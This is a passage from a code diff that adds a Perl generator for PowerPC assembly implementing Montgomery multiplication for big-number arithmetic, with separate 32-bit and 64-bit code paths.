+	ld	$t7,`$FRAME+56`($sp)
+___
+} else {
+$code.=<<___;
+	lwz	$t1,`$FRAME+0`($sp)
+	lwz	$t0,`$FRAME+4`($sp)
+	lwz	$t3,`$FRAME+8`($sp)
+	lwz	$t2,`$FRAME+12`($sp)
+	lwz	$t5,`$FRAME+16`($sp)
+	lwz	$t4,`$FRAME+20`($sp)
+	lwz	$t7,`$FRAME+24`($sp)
+	lwz	$t6,`$FRAME+28`($sp)
+___
+}
+$code.=<<___;
+	lfd	$A0,`$FRAME+64`($sp)
+	lfd	$A1,`$FRAME+72`($sp)
+	lfd	$A2,`$FRAME+80`($sp)
+	lfd	$A3,`$FRAME+88`($sp)
+	lfd	$N0,`$FRAME+96`($sp)
+	lfd	$N1,`$FRAME+104`($sp)
+	lfd	$N2,`$FRAME+112`($sp)
+	lfd	$N3,`$FRAME+120`($sp)
+	fcfid	$A0,$A0
+	fcfid	$A1,$A1
+	fcfid	$A2,$A2
+	fcfid	$A3,$A3
+	fcfid	$N0,$N0
+	fcfid	$N1,$N1
+	fcfid	$N2,$N2
+	fcfid	$N3,$N3
+	addi	$ap,$ap,16
+	addi	$np,$np,16
+
+	fmul	$T1a,$A1,$ba
+	fmul	$T1b,$A1,$bb
+	fmul	$T2a,$A2,$ba
+	fmul	$T2b,$A2,$bb
+	stfd	$A0,8($nap_d)		; save a[j] in double format
+	stfd	$A1,16($nap_d)
+	fmul	$T3a,$A3,$ba
+	fmul	$T3b,$A3,$bb
+	fmadd	$T0a,$A0,$ba,$dota
+	fmadd	$T0b,$A0,$bb,$dotb
+	stfd	$A2,24($nap_d)		; save a[j+1] in double format
+	stfd	$A3,32($nap_d)
+___
+if ($SIZE_T==8 or $flavour =~ /osx/) {
+$code.=<<___;
+	fmadd	$T1a,$A0,$bc,$T1a
+	fmadd	$T1b,$A0,$bd,$T1b
+	fmadd	$T2a,$A1,$bc,$T2a
+	fmadd	$T2b,$A1,$bd,$T2b
+	stfd	$N0,40($nap_d)		; save n[j] in double format
+	stfd	$N1,48($nap_d)
+	fmadd	$T3a,$A2,$bc,$T3a
+	fmadd	$T3b,$A2,$bd,$T3b
+	 add	$t0,$t0,$carry		; can not overflow
+	fmul	$dota,$A3,$bc
+	fmul	$dotb,$A3,$bd
+	stfd	$N2,56($nap_d)		; save n[j+1] in double format
+	stfdu	$N3,64($nap_d)
+	 srdi	$carry,$t0,16
+	 add	$t1,$t1,$carry
+	 srdi	$carry,$t1,16
+
+	fmadd	$T1a,$N1,$na,$T1a
+	fmadd	$T1b,$N1,$nb,$T1b
+	 insrdi	$t0,$t1,16,32
+	fmadd	$T2a,$N2,$na,$T2a
+	fmadd	$T2b,$N2,$nb,$T2b
+	 add	$t2,$t2,$carry
+	fmadd	$T3a,$N3,$na,$T3a
+	fmadd	$T3b,$N3,$nb,$T3b
+	 srdi	$carry,$t2,16
+	fmadd	$T0a,$N0,$na,$T0a
+	fmadd	$T0b,$N0,$nb,$T0b
+	 insrdi	$t0,$t2,16,16
+	 add	$t3,$t3,$carry
+	 srdi	$carry,$t3,16
+
+	fmadd	$T1a,$N0,$nc,$T1a
+	fmadd	$T1b,$N0,$nd,$T1b
+	 insrdi	$t0,$t3,16,0		; 0..63 bits
+	fmadd	$T2a,$N1,$nc,$T2a
+	fmadd	$T2b,$N1,$nd,$T2b
+	 add	$t4,$t4,$carry
+	fmadd	$T3a,$N2,$nc,$T3a
+	fmadd	$T3b,$N2,$nd,$T3b
+	 srdi	$carry,$t4,16
+	fmadd	$dota,$N3,$nc,$dota
+	fmadd	$dotb,$N3,$nd,$dotb
+	 add	$t5,$t5,$carry
+	 srdi	$carry,$t5,16
+	 insrdi	$t4,$t5,16,32
+
+	fctid	$T0a,$T0a
+	fctid	$T0b,$T0b
+	 add	$t6,$t6,$carry
+	fctid	$T1a,$T1a
+	fctid	$T1b,$T1b
+	 srdi	$carry,$t6,16
+	fctid	$T2a,$T2a
+	fctid	$T2b,$T2b
+	 insrdi	$t4,$t6,16,16
+	fctid	$T3a,$T3a
+	fctid	$T3b,$T3b
+	 add	$t7,$t7,$carry
+	 insrdi	$t4,$t7,16,0		; 64..127 bits
+	 srdi	$carry,$t7,16		; upper 33 bits
+
+	stfd	$T0a,`$FRAME+0`($sp)
+	stfd	$T0b,`$FRAME+8`($sp)
+	stfd	$T1a,`$FRAME+16`($sp)
+	stfd	$T1b,`$FRAME+24`($sp)
+	stfd	$T2a,`$FRAME+32`($sp)
+	stfd	$T2b,`$FRAME+40`($sp)
+	stfd	$T3a,`$FRAME+48`($sp)
+	stfd	$T3b,`$FRAME+56`($sp)
+	 std	$t0,8($tp)		; tp[j-1]
+	 stdu	$t4,16($tp)		; tp[j]
+___
+} else {
+$code.=<<___;
+	fmadd	$T1a,$A0,$bc,$T1a
+	fmadd	$T1b,$A0,$bd,$T1b
+	 addc	$t0,$t0,$carry
+	 adde	$t1,$t1,$c1
+	 srwi	$carry,$t0,16
+	fmadd	$T2a,$A1,$bc,$T2a
+	fmadd	$T2b,$A1,$bd,$T2b
+	stfd	$N0,40($nap_d)		; save n[j] in double format
+	stfd	$N1,48($nap_d)
+	 srwi	$c1,$t1,16
+	 insrwi	$carry,$t1,16,0
+	fmadd	$T3a,$A2,$bc,$T3a
+	fmadd	$T3b,$A2,$bd,$T3b
+	 addc	$t2,$t2,$carry
+	 adde	$t3,$t3,$c1
+	 srwi	$carry,$t2,16
+	fmul	$dota,$A3,$bc
+	fmul	$dotb,$A3,$bd
+	stfd	$N2,56($nap_d)		; save n[j+1] in double format
+	stfdu	$N3,64($nap_d)
+	 insrwi	$t0,$t2,16,0		; 0..31 bits
+	 srwi	$c1,$t3,16
+	 insrwi	$carry,$t3,16,0
+
+	fmadd	$T1a,$N1,$na,$T1a
+	fmadd	$T1b,$N1,$nb,$T1b
+	 lwz	$t3,`$FRAME+32`($sp)	; permuted $t1
+	 lwz	$t2,`$FRAME+36`($sp)	; permuted $t0
+	 addc	$t4,$t4,$carry
+	 adde	$t5,$t5,$c1
+	 srwi	$carry,$t4,16
+	fmadd	$T2a,$N2,$na,$T2a
+	fmadd	$T2b,$N2,$nb,$T2b
+	 srwi	$c1,$t5,16
+	 insrwi	$carry,$t5,16,0
+	fmadd	$T3a,$N3,$na,$T3a
+	fmadd	$T3b,$N3,$nb,$T3b
+	 addc	$t6,$t6,$carry
+	 adde	$t7,$t7,$c1
+	 srwi	$carry,$t6,16
+	fmadd	$T0a,$N0,$na,$T0a
+	fmadd	$T0b,$N0,$nb,$T0b
+	 insrwi	$t4,$t6,16,0		; 32..63 bits
+	 srwi	$c1,$t7,16
+	 insrwi	$carry,$t7,16,0
+
+	fmadd	$T1a,$N0,$nc,$T1a
+	fmadd	$T1b,$N0,$nd,$T1b
+	 lwz	$t7,`$FRAME+40`($sp)	; permuted $t3
+	 lwz	$t6,`$FRAME+44`($sp)	; permuted $t2
+	 addc	$t2,$t2,$carry
+	 adde	$t3,$t3,$c1
+	 srwi	$carry,$t2,16
+	fmadd	$T2a,$N1,$nc,$T2a
+	fmadd	$T2b,$N1,$nd,$T2b
+	 stw	$t0,12($tp)		; tp[j-1]
+	 stw	$t4,8($tp)
+	 srwi	$c1,$t3,16
+	 insrwi	$carry,$t3,16,0
+	fmadd	$T3a,$N2,$nc,$T3a
+	fmadd	$T3b,$N2,$nd,$T3b
+	 lwz	$t1,`$FRAME+48`($sp)	; permuted $t5
+	 lwz	$t0,`$FRAME+52`($sp)	; permuted $t4
+	 addc	$t6,$t6,$carry
+	 adde	$t7,$t7,$c1
+	 srwi	$carry,$t6,16
+	fmadd	$dota,$N3,$nc,$dota
+	fmadd	$dotb,$N3,$nd,$dotb
+	 insrwi	$t2,$t6,16,0		; 64..95 bits
+	 srwi	$c1,$t7,16
+	 insrwi	$carry,$t7,16,0
+
+	fctid	$T0a,$T0a
+	fctid	$T0b,$T0b
+	 lwz	$t5,`$FRAME+56`($sp)	; permuted $t7
+	 lwz	$t4,`$FRAME+60`($sp)	; permuted $t6
+	 addc	$t0,$t0,$carry
+	 adde	$t1,$t1,$c1
+	 srwi	$carry,$t0,16
+	fctid	$T1a,$T1a
+	fctid	$T1b,$T1b
+	 srwi	$c1,$t1,16
+	 insrwi	$carry,$t1,16,0
+	fctid	$T2a,$T2a
+	fctid	$T2b,$T2b
+	 addc	$t4,$t4,$carry
+	 adde	$t5,$t5,$c1
+	 srwi	$carry,$t4,16
+	fctid	$T3a,$T3a
+	fctid	$T3b,$T3b
+	 insrwi	$t0,$t4,16,0		; 96..127 bits
+	 srwi	$c1,$t5,16
+	 insrwi	$carry,$t5,16,0
+
+	stfd	$T0a,`$FRAME+0`($sp)
+	stfd	$T0b,`$FRAME+8`($sp)
+	stfd	$T1a,`$FRAME+16`($sp)
+	stfd	$T1b,`$FRAME+24`($sp)
+	stfd	$T2a,`$FRAME+32`($sp)
+	stfd	$T2b,`$FRAME+40`($sp)
+	stfd	$T3a,`$FRAME+48`($sp)
+	stfd	$T3b,`$FRAME+56`($sp)
+	 stw	$t2,20($tp)		; tp[j]
+	 stwu	$t0,16($tp)
+___
+}
+$code.=<<___;
+	bdnz-	L1st
+
+	fctid	$dota,$dota
+	fctid	$dotb,$dotb
+___
+if ($SIZE_T==8 or $flavour =~ /osx/) {
+$code.=<<___;
+	ld	$t0,`$FRAME+0`($sp)
+	ld	$t1,`$FRAME+8`($sp)
+	ld	$t2,`$FRAME+16`($sp)
+	ld	$t3,`$FRAME+24`($sp)
+	ld	$t4,`$FRAME+32`($sp)
+	ld	$t5,`$FRAME+40`($sp)
+	ld	$t6,`$FRAME+48`($sp)
+	ld	$t7,`$FRAME+56`($sp)
+	stfd	$dota,`$FRAME+64`($sp)
+	stfd	$dotb,`$FRAME+72`($sp)
+
+	add	$t0,$t0,$carry		; can not overflow
+	srdi	$carry,$t0,16
+	add	$t1,$t1,$carry
+	srdi	$carry,$t1,16
+	insrdi	$t0,$t1,16,32
+	add	$t2,$t2,$carry
+	srdi	$carry,$t2,16
+	insrdi	$t0,$t2,16,16
+	add	$t3,$t3,$carry
+	srdi	$carry,$t3,16
+	insrdi	$t0,$t3,16,0		; 0..63 bits
+	add	$t4,$t4,$carry
+	srdi	$carry,$t4,16
+	add	$t5,$t5,$carry
+	srdi	$carry,$t5,16
+	insrdi	$t4,$t5,16,32
+	add	$t6,$t6,$carry
+	srdi	$carry,$t6,16
+	insrdi	$t4,$t6,16,16
+	add	$t7,$t7,$carry
+	insrdi	$t4,$t7,16,0		; 64..127 bits
+	srdi	$carry,$t7,16		; upper 33 bits
+	ld	$t6,`$FRAME+64`($sp)
+	ld	$t7,`$FRAME+72`($sp)
+
+	std	$t0,8($tp)		; tp[j-1]
+	stdu	$t4,16($tp)		; tp[j]
+
+	add	$t6,$t6,$carry		; can not overflow
+	srdi	$carry,$t6,16
+	add	$t7,$t7,$carry
+	insrdi	$t6,$t7,48,0
+	srdi	$ovf,$t7,48
+	std	$t6,8($tp)		; tp[num-1]
+___
+} else {
+$code.=<<___;
+	lwz	$t1,`$FRAME+0`($sp)
+	lwz	$t0,`$FRAME+4`($sp)
+	lwz	$t3,`$FRAME+8`($sp)
+	lwz	$t2,`$FRAME+12`($sp)
+	lwz	$t5,`$FRAME+16`($sp)
+	lwz	$t4,`$FRAME+20`($sp)
+	lwz	$t7,`$FRAME+24`($sp)
+	lwz	$t6,`$FRAME+28`($sp)
+	stfd	$dota,`$FRAME+64`($sp)
+	stfd	$dotb,`$FRAME+72`($sp)
+
+	addc	$t0,$t0,$carry
+	adde	$t1,$t1,$c1
+	srwi	$carry,$t0,16
+	insrwi	$carry,$t1,16,0
+	srwi	$c1,$t1,16
+	addc	$t2,$t2,$carry
+	adde	$t3,$t3,$c1
+	srwi	$carry,$t2,16
+	 insrwi	$t0,$t2,16,0		; 0..31 bits
+	insrwi	$carry,$t3,16,0
+	srwi	$c1,$t3,16
+	addc	$t4,$t4,$carry
+	adde	$t5,$t5,$c1
+	srwi	$carry,$t4,16
+	insrwi	$carry,$t5,16,0
+	srwi	$c1,$t5,16
+	addc	$t6,$t6,$carry
+	adde	$t7,$t7,$c1
+	srwi	$carry,$t6,16
+	 insrwi	$t4,$t6,16,0		; 32..63 bits
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+	 stw	$t0,12($tp)		; tp[j-1]
+	 stw	$t4,8($tp)
+
+	lwz	$t3,`$FRAME+32`($sp)	; permuted $t1
+	lwz	$t2,`$FRAME+36`($sp)	; permuted $t0
+	lwz	$t7,`$FRAME+40`($sp)	; permuted $t3
+	lwz	$t6,`$FRAME+44`($sp)	; permuted $t2
+	lwz	$t1,`$FRAME+48`($sp)	; permuted $t5
+	lwz	$t0,`$FRAME+52`($sp)	; permuted $t4
+	lwz	$t5,`$FRAME+56`($sp)	; permuted $t7
+	lwz	$t4,`$FRAME+60`($sp)	; permuted $t6
+
+	addc	$t2,$t2,$carry
+	adde	$t3,$t3,$c1
+	srwi	$carry,$t2,16
+	insrwi	$carry,$t3,16,0
+	srwi	$c1,$t3,16
+	addc	$t6,$t6,$carry
+	adde	$t7,$t7,$c1
+	srwi	$carry,$t6,16
+	 insrwi	$t2,$t6,16,0		; 64..95 bits
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+	addc	$t0,$t0,$carry
+	adde	$t1,$t1,$c1
+	srwi	$carry,$t0,16
+	insrwi	$carry,$t1,16,0
+	srwi	$c1,$t1,16
+	addc	$t4,$t4,$carry
+	adde	$t5,$t5,$c1
+	srwi	$carry,$t4,16
+	 insrwi	$t0,$t4,16,0		; 96..127 bits
+	insrwi	$carry,$t5,16,0
+	srwi	$c1,$t5,16
+	 stw	$t2,20($tp)		; tp[j]
+	 stwu	$t0,16($tp)
+
+	lwz	$t7,`$FRAME+64`($sp)
+	lwz	$t6,`$FRAME+68`($sp)
+	lwz	$t5,`$FRAME+72`($sp)
+	lwz	$t4,`$FRAME+76`($sp)
+
+	addc	$t6,$t6,$carry
+	adde	$t7,$t7,$c1
+	srwi	$carry,$t6,16
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+	addc	$t4,$t4,$carry
+	adde	$t5,$t5,$c1
+
+	insrwi	$t6,$t4,16,0
+	srwi	$t4,$t4,16
+	insrwi	$t4,$t5,16,0
+	srwi	$ovf,$t5,16
+	stw	$t6,12($tp)		; tp[num-1]
+	stw	$t4,8($tp)
+___
+}
+$code.=<<___;
+	slwi	$t7,$num,2
+	subf	$nap_d,$t7,$nap_d	; rewind pointer
+
+	li	$i,8			; i=1
+.align	5
+Louter:
+	addi	$tp,$sp,`$FRAME+$TRANSFER`
+	li	$carry,0
+	mtctr	$j
+___
+$code.=<<___ if ($SIZE_T==8);
+	ldx	$t3,$bp,$i		; bp[i]
+
+	ld	$t6,`$FRAME+$TRANSFER+8`($sp)	; tp[0]
+	mulld	$t7,$a0,$t3		; ap[0]*bp[i]
+	add	$t7,$t7,$t6		; ap[0]*bp[i]+tp[0]
+	; transfer bp[i] to FPU as 4x16-bit values
+	extrdi	$t0,$t3,16,48
+	extrdi	$t1,$t3,16,32
+	extrdi	$t2,$t3,16,16
+	extrdi	$t3,$t3,16,0
+	std	$t0,`$FRAME+0`($sp)
+	std	$t1,`$FRAME+8`($sp)
+	std	$t2,`$FRAME+16`($sp)
+	std	$t3,`$FRAME+24`($sp)
+
+	mulld	$t7,$t7,$n0		; tp[0]*n0
+	; transfer (ap[0]*bp[i]+tp[0])*n0 to FPU as 4x16-bit values
+	extrdi	$t4,$t7,16,48
+	extrdi	$t5,$t7,16,32
+	extrdi	$t6,$t7,16,16
+	extrdi	$t7,$t7,16,0
+	std	$t4,`$FRAME+32`($sp)
+	std	$t5,`$FRAME+40`($sp)
+	std	$t6,`$FRAME+48`($sp)
+	std	$t7,`$FRAME+56`($sp)
+___
+$code.=<<___ if ($SIZE_T==4);
+	add	$t0,$bp,$i
+	li	$c1,0
+	lwz	$t1,0($t0)		; bp[i,i+1]
+	lwz	$t3,4($t0)
+
+	mullw	$t4,$a0,$t1		; ap[0]*bp[i]
+	lwz	$t0,`$FRAME+$TRANSFER+8+4`($sp)	; tp[0]
+	mulhwu	$t5,$a0,$t1
+	lwz	$t2,`$FRAME+$TRANSFER+8`($sp)	; tp[0]
+	mullw	$t6,$a1,$t1
+	mullw	$t7,$a0,$t3
+	add	$t5,$t5,$t6
+	add	$t5,$t5,$t7
+	addc	$t4,$t4,$t0		; ap[0]*bp[i]+tp[0]
+	adde	$t5,$t5,$t2
+	; transfer bp[i] to FPU as 4x16-bit values
+	extrwi	$t0,$t1,16,16
+	extrwi	$t1,$t1,16,0
+	extrwi	$t2,$t3,16,16
+	extrwi	$t3,$t3,16,0
+	std	$t0,`$FRAME+0`($sp)	; yes, std in 32-bit build
+	std	$t1,`$FRAME+8`($sp)
+	std	$t2,`$FRAME+16`($sp)
+	std	$t3,`$FRAME+24`($sp)
+
+	mullw	$t0,$t4,$n0		; mulld tp[0]*n0
+	mulhwu	$t1,$t4,$n0
+	mullw	$t2,$t5,$n0
+	mullw	$t3,$t4,$n1
+	add	$t1,$t1,$t2
+	add	$t1,$t1,$t3
+	; transfer (ap[0]*bp[i]+tp[0])*n0 to FPU as 4x16-bit values
+	extrwi	$t4,$t0,16,16
+	extrwi	$t5,$t0,16,0
+	extrwi	$t6,$t1,16,16
+	extrwi	$t7,$t1,16,0
+	std	$t4,`$FRAME+32`($sp)	; yes, std in 32-bit build
+	std	$t5,`$FRAME+40`($sp)
+	std	$t6,`$FRAME+48`($sp)
+	std	$t7,`$FRAME+56`($sp)
+___
+$code.=<<___;
+	lfd	$A0,8($nap_d)		; load a[j] in double format
+	lfd	$A1,16($nap_d)
+	lfd	$A2,24($nap_d)		; load a[j+1] in double format
+	lfd	$A3,32($nap_d)
+	lfd	$N0,40($nap_d)		; load n[j] in double format
+	lfd	$N1,48($nap_d)
+	lfd	$N2,56($nap_d)		; load n[j+1] in double format
+	lfdu	$N3,64($nap_d)
+
+	lfd	$ba,`$FRAME+0`($sp)
+	lfd	$bb,`$FRAME+8`($sp)
+	lfd	$bc,`$FRAME+16`($sp)
+	lfd	$bd,`$FRAME+24`($sp)
+	lfd	$na,`$FRAME+32`($sp)
+	lfd	$nb,`$FRAME+40`($sp)
+	lfd	$nc,`$FRAME+48`($sp)
+	lfd	$nd,`$FRAME+56`($sp)
+
+	fcfid	$ba,$ba
+	fcfid	$bb,$bb
+	fcfid	$bc,$bc
+	fcfid	$bd,$bd
+	fcfid	$na,$na
+	fcfid	$nb,$nb
+	fcfid	$nc,$nc
+	fcfid	$nd,$nd
+
+	fmul	$T1a,$A1,$ba
+	fmul	$T1b,$A1,$bb
+	fmul	$T2a,$A2,$ba
+	fmul	$T2b,$A2,$bb
+	fmul	$T3a,$A3,$ba
+	fmul	$T3b,$A3,$bb
+	fmul	$T0a,$A0,$ba
+	fmul	$T0b,$A0,$bb
+
+	fmadd	$T1a,$A0,$bc,$T1a
+	fmadd	$T1b,$A0,$bd,$T1b
+	fmadd	$T2a,$A1,$bc,$T2a
+	fmadd	$T2b,$A1,$bd,$T2b
+	fmadd	$T3a,$A2,$bc,$T3a
+	fmadd	$T3b,$A2,$bd,$T3b
+	fmul	$dota,$A3,$bc
+	fmul	$dotb,$A3,$bd
+
+	fmadd	$T1a,$N1,$na,$T1a
+	fmadd	$T1b,$N1,$nb,$T1b
+	 lfd	$A0,8($nap_d)		; load a[j] in double format
+	 lfd	$A1,16($nap_d)
+	fmadd	$T2a,$N2,$na,$T2a
+	fmadd	$T2b,$N2,$nb,$T2b
+	 lfd	$A2,24($nap_d)		; load a[j+1] in double format
+	 lfd	$A3,32($nap_d)
+	fmadd	$T3a,$N3,$na,$T3a
+	fmadd	$T3b,$N3,$nb,$T3b
+	fmadd	$T0a,$N0,$na,$T0a
+	fmadd	$T0b,$N0,$nb,$T0b
+
+	fmadd	$T1a,$N0,$nc,$T1a
+	fmadd	$T1b,$N0,$nd,$T1b
+	fmadd	$T2a,$N1,$nc,$T2a
+	fmadd	$T2b,$N1,$nd,$T2b
+	fmadd	$T3a,$N2,$nc,$T3a
+	fmadd	$T3b,$N2,$nd,$T3b
+	fmadd	$dota,$N3,$nc,$dota
+	fmadd	$dotb,$N3,$nd,$dotb
+
+	fctid	$T0a,$T0a
+	fctid	$T0b,$T0b
+	fctid	$T1a,$T1a
+	fctid	$T1b,$T1b
+	fctid	$T2a,$T2a
+	fctid	$T2b,$T2b
+	fctid	$T3a,$T3a
+	fctid	$T3b,$T3b
+
+	stfd	$T0a,`$FRAME+0`($sp)
+	stfd	$T0b,`$FRAME+8`($sp)
+	stfd	$T1a,`$FRAME+16`($sp)
+	stfd	$T1b,`$FRAME+24`($sp)
+	stfd	$T2a,`$FRAME+32`($sp)
+	stfd	$T2b,`$FRAME+40`($sp)
+	stfd	$T3a,`$FRAME+48`($sp)
+	stfd	$T3b,`$FRAME+56`($sp)
+
+.align	5
+Linner:
+	fmul	$T1a,$A1,$ba
+	fmul	$T1b,$A1,$bb
+	fmul	$T2a,$A2,$ba
+	fmul	$T2b,$A2,$bb
+	lfd	$N0,40($nap_d)		; load n[j] in double format
+	lfd	$N1,48($nap_d)
+	fmul	$T3a,$A3,$ba
+	fmul	$T3b,$A3,$bb
+	fmadd	$T0a,$A0,$ba,$dota
+	fmadd	$T0b,$A0,$bb,$dotb
+	lfd	$N2,56($nap_d)		; load n[j+1] in double format
+	lfdu	$N3,64($nap_d)
+
+	fmadd	$T1a,$A0,$bc,$T1a
+	fmadd	$T1b,$A0,$bd,$T1b
+	fmadd	$T2a,$A1,$bc,$T2a
+	fmadd	$T2b,$A1,$bd,$T2b
+	 lfd	$A0,8($nap_d)		; load a[j] in double format
+	 lfd	$A1,16($nap_d)
+	fmadd	$T3a,$A2,$bc,$T3a
+	fmadd	$T3b,$A2,$bd,$T3b
+	fmul	$dota,$A3,$bc
+	fmul	$dotb,$A3,$bd
+	 lfd	$A2,24($nap_d)		; load a[j+1] in double format
+	 lfd	$A3,32($nap_d)
+___
+if ($SIZE_T==8 or $flavour =~ /osx/) {
+$code.=<<___;
+	fmadd	$T1a,$N1,$na,$T1a
+	fmadd	$T1b,$N1,$nb,$T1b
+	 ld	$t0,`$FRAME+0`($sp)
+	 ld	$t1,`$FRAME+8`($sp)
+	fmadd	$T2a,$N2,$na,$T2a
+	fmadd	$T2b,$N2,$nb,$T2b
+	 ld	$t2,`$FRAME+16`($sp)
+	 ld	$t3,`$FRAME+24`($sp)
+	fmadd	$T3a,$N3,$na,$T3a
+	fmadd	$T3b,$N3,$nb,$T3b
+	 add	$t0,$t0,$carry		; can not overflow
+	 ld	$t4,`$FRAME+32`($sp)
+	 ld	$t5,`$FRAME+40`($sp)
+	fmadd	$T0a,$N0,$na,$T0a
+	fmadd	$T0b,$N0,$nb,$T0b
+	 srdi	$carry,$t0,16
+	 add	$t1,$t1,$carry
+	 srdi	$carry,$t1,16
+	 ld	$t6,`$FRAME+48`($sp)
+	 ld	$t7,`$FRAME+56`($sp)
+
+	fmadd	$T1a,$N0,$nc,$T1a
+	fmadd	$T1b,$N0,$nd,$T1b
+	 insrdi	$t0,$t1,16,32
+	 ld	$t1,8($tp)		; tp[j]
+	fmadd	$T2a,$N1,$nc,$T2a
+	fmadd	$T2b,$N1,$nd,$T2b
+	 add	$t2,$t2,$carry
+	fmadd	$T3a,$N2,$nc,$T3a
+	fmadd	$T3b,$N2,$nd,$T3b
+	 srdi	$carry,$t2,16
+	 insrdi	$t0,$t2,16,16
+	fmadd	$dota,$N3,$nc,$dota
+	fmadd	$dotb,$N3,$nd,$dotb
+	 add	$t3,$t3,$carry
+	 ldu	$t2,16($tp)		; tp[j+1]
+	 srdi	$carry,$t3,16
+	 insrdi	$t0,$t3,16,0		; 0..63 bits
+	 add	$t4,$t4,$carry
+
+	fctid	$T0a,$T0a
+	fctid	$T0b,$T0b
+	 srdi	$carry,$t4,16
+	fctid	$T1a,$T1a
+	fctid	$T1b,$T1b
+	 add	$t5,$t5,$carry
+	fctid	$T2a,$T2a
+	fctid	$T2b,$T2b
+	 srdi	$carry,$t5,16
+	 insrdi	$t4,$t5,16,32
+	fctid	$T3a,$T3a
+	fctid	$T3b,$T3b
+	 add	$t6,$t6,$carry
+	 srdi	$carry,$t6,16
+	 insrdi	$t4,$t6,16,16
+
+	stfd	$T0a,`$FRAME+0`($sp)
+	stfd	$T0b,`$FRAME+8`($sp)
+	 add	$t7,$t7,$carry
+	 addc	$t3,$t0,$t1
+___
+$code.=<<___ if ($SIZE_T==4);		# adjust XER[CA]
+	extrdi	$t0,$t0,32,0
+	extrdi	$t1,$t1,32,0
+	adde	$t0,$t0,$t1
+___
+$code.=<<___;
+	stfd	$T1a,`$FRAME+16`($sp)
+	stfd	$T1b,`$FRAME+24`($sp)
+	 insrdi	$t4,$t7,16,0		; 64..127 bits
+	 srdi	$carry,$t7,16		; upper 33 bits
+	stfd	$T2a,`$FRAME+32`($sp)
+	stfd	$T2b,`$FRAME+40`($sp)
+	 adde	$t5,$t4,$t2
+___
+$code.=<<___ if ($SIZE_T==4);		# adjust XER[CA]
+	extrdi	$t4,$t4,32,0
+	extrdi	$t2,$t2,32,0
+	adde	$t4,$t4,$t2
+___
+$code.=<<___;
+	stfd	$T3a,`$FRAME+48`($sp)
+	stfd	$T3b,`$FRAME+56`($sp)
+	 addze	$carry,$carry
+	 std	$t3,-16($tp)		; tp[j-1]
+	 std	$t5,-8($tp)		; tp[j]
+___
+} else {
+$code.=<<___;
+	fmadd	$T1a,$N1,$na,$T1a
+	fmadd	$T1b,$N1,$nb,$T1b
+	 lwz	$t1,`$FRAME+0`($sp)
+	 lwz	$t0,`$FRAME+4`($sp)
+	fmadd	$T2a,$N2,$na,$T2a
+	fmadd	$T2b,$N2,$nb,$T2b
+	 lwz	$t3,`$FRAME+8`($sp)
+	 lwz	$t2,`$FRAME+12`($sp)
+	fmadd	$T3a,$N3,$na,$T3a
+	fmadd	$T3b,$N3,$nb,$T3b
+	 lwz	$t5,`$FRAME+16`($sp)
+	 lwz	$t4,`$FRAME+20`($sp)
+	 addc	$t0,$t0,$carry
+	 adde	$t1,$t1,$c1
+	 srwi	$carry,$t0,16
+	fmadd	$T0a,$N0,$na,$T0a
+	fmadd	$T0b,$N0,$nb,$T0b
+	 lwz	$t7,`$FRAME+24`($sp)
+	 lwz	$t6,`$FRAME+28`($sp)
+	 srwi	$c1,$t1,16
+	 insrwi	$carry,$t1,16,0
+
+	fmadd	$T1a,$N0,$nc,$T1a
+	fmadd	$T1b,$N0,$nd,$T1b
+	 addc	$t2,$t2,$carry
+	 adde	$t3,$t3,$c1
+	 srwi	$carry,$t2,16
+	fmadd	$T2a,$N1,$nc,$T2a
+	fmadd	$T2b,$N1,$nd,$T2b
+	 insrwi	$t0,$t2,16,0		; 0..31 bits
+	 srwi	$c1,$t3,16
+	 insrwi	$carry,$t3,16,0
+	fmadd	$T3a,$N2,$nc,$T3a
+	fmadd	$T3b,$N2,$nd,$T3b
+	 lwz	$t2,12($tp)		; tp[j]
+	 lwz	$t3,8($tp)
+	 addc	$t4,$t4,$carry
+	 adde	$t5,$t5,$c1
+	 srwi	$carry,$t4,16
+	fmadd	$dota,$N3,$nc,$dota
+	fmadd	$dotb,$N3,$nd,$dotb
+	 srwi	$c1,$t5,16
+	 insrwi	$carry,$t5,16,0
+
+	fctid	$T0a,$T0a
+	 addc	$t6,$t6,$carry
+	 adde	$t7,$t7,$c1
+	 srwi	$carry,$t6,16
+	fctid	$T0b,$T0b
+	 insrwi	$t4,$t6,16,0		; 32..63 bits
+	 srwi	$c1,$t7,16
+	 insrwi	$carry,$t7,16,0
+	fctid	$T1a,$T1a
+	 addc	$t0,$t0,$t2
+	 adde	$t4,$t4,$t3
+	 lwz	$t3,`$FRAME+32`($sp)	; permuted $t1
+	 lwz	$t2,`$FRAME+36`($sp)	; permuted $t0
+	fctid	$T1b,$T1b
+	 addze	$carry,$carry
+	 addze	$c1,$c1
+	 stw	$t0,4($tp)		; tp[j-1]
+	 stw	$t4,0($tp)
+	fctid	$T2a,$T2a
+	 addc	$t2,$t2,$carry
+	 adde	$t3,$t3,$c1
+	 srwi	$carry,$t2,16
+	 lwz	$t7,`$FRAME+40`($sp)	; permuted $t3
+	 lwz	$t6,`$FRAME+44`($sp)	; permuted $t2
+	fctid	$T2b,$T2b
+	 srwi	$c1,$t3,16
+	 insrwi	$carry,$t3,16,0
+	 lwz	$t1,`$FRAME+48`($sp)	; permuted $t5
+	 lwz	$t0,`$FRAME+52`($sp)	; permuted $t4
+	fctid	$T3a,$T3a
+	 addc	$t6,$t6,$carry
+	 adde	$t7,$t7,$c1
+	 srwi	$carry,$t6,16
+	 lwz	$t5,`$FRAME+56`($sp)	; permuted $t7
+	 lwz	$t4,`$FRAME+60`($sp)	; permuted $t6
+	fctid	$T3b,$T3b
+
+	 insrwi	$t2,$t6,16,0		; 64..95 bits
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+	 lwz	$t6,20($tp)
+	 lwzu	$t7,16($tp)
+	addc	$t0,$t0,$carry
+	 stfd	$T0a,`$FRAME+0`($sp)
+	adde	$t1,$t1,$c1
+	srwi	$carry,$t0,16
+	 stfd	$T0b,`$FRAME+8`($sp)
+	insrwi	$carry,$t1,16,0
+	srwi	$c1,$t1,16
+	addc	$t4,$t4,$carry
+	 stfd	$T1a,`$FRAME+16`($sp)
+	adde	$t5,$t5,$c1
+	srwi	$carry,$t4,16
+	 insrwi	$t0,$t4,16,0		; 96..127 bits
+	 stfd	$T1b,`$FRAME+24`($sp)
+	insrwi	$carry,$t5,16,0
+	srwi	$c1,$t5,16
+
+	addc	$t2,$t2,$t6
